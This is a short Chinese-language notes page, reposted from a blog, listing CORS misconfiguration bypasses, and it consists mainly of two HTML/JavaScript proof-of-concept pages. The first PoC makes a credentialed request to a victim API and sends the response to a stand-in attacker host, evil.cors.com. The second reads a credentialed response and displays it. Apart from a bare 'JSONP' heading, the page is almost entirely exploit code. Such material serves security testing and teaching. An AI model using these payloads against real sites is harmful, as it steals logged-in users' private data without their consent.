跨域资源共享(CORS)-漏洞整理

绕过方法整理

绕过 - 仅对域名校验

#POC
#"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- 
    Credentials: true".
#Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net.
<html>
<body>
<button type='button' οnclick='cors()'>CORS</button>
<p id='demo'></p>
<script>
function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
var a = this.responseText; 
document.getElementById("demo").innerHTML = a;
xhttp.open("POST", "http://evil.cors.com", true);
xhttp.withCredentials = true;
console.log(a);
xhttp.send("data="+a);
}
};
xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true);
xhttp.withCredentials = true;
xhttp.send();
}
</script>
</body>
</html>

View Code

访问源未列入白名单，并且具备规则Access-Control-Allow-Credentials: true

<html>
     <body>
         <h2>CORS PoC</h2>
         <div id="demo">
             <button type="button" οnclick="cors()">Exploit</button>
         </div>
         <script>
             function cors() {
             var xhr = new XMLHttpRequest();
             xhr.onreadystatechange = function() {
                 if (this.readyState == 4 && this.status == 200) {
                 document.getElementById("demo").innerHTML = alert(this.responseText);
                 }
             };
              xhr.open("GET",
                       "https://api.xx.com/endpoint", true);
             xhr.withCredentials = true;
             xhr.send();
             }
         </script>
     </body>
 </html>

View Code

 同源策略绕过

JSONP

 

转载于:https://www.cnblogs.com/AtesetEnginner/p/11261569.html